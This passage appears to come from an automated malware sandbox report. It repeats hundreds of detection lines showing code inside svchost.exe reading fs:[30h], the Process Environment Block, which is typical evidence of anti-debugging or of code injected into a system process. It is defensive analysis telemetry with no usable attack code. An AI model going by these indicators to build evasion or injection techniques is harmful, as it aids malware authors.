            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]2_2_0382C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h]2_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]2_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]2_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]2_2_0383208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038280A0 mov eax, dword ptr fs:[00000030h]2_2_038280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h]2_2_038C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]2_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]2_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]2_2_038B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0382A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]2_2_038380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h]2_2_038B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]2_2_0382C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]2_2_038720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]2_2_038B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]2_2_0382A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]2_2_0382C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]2_2_038C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]2_2_03832050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]2_2_038B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]2_2_0385C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]2_2_038D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]2_2_038307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h]2_2_038E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]2_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]2_2_038B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]2_2_038BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]2_2_0386C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]2_2_03830710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]2_2_03860710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]2_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]2_2_038AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]2_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]2_2_03830750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]2_2_038BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]2_2_038B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]2_2_03838770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]2_2_0386C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]2_2_038666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]2_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]2_2_038AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]2_2_03872619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]2_2_0384E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]2_2_03866620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]2_2_03868620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]2_2_0383262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]2_2_0384C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]2_2_03862674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]2_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h]2_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]2_2_03864588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]2_2_0386E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]2_2_038365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]2_2_038325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]2_2_038C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h]2_2_038EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]2_2_038364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]2_2_038644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]2_2_038BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]2_2_038304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]2_2_0382C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]2_2_0386A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h]2_2_038EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]2_2_0382645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]2_2_0385245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]2_2_038BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]2_2_038DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]2_2_0385EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]2_2_038BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904B00 mov eax, dword ptr fs:[00000030h]2_2_03904B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
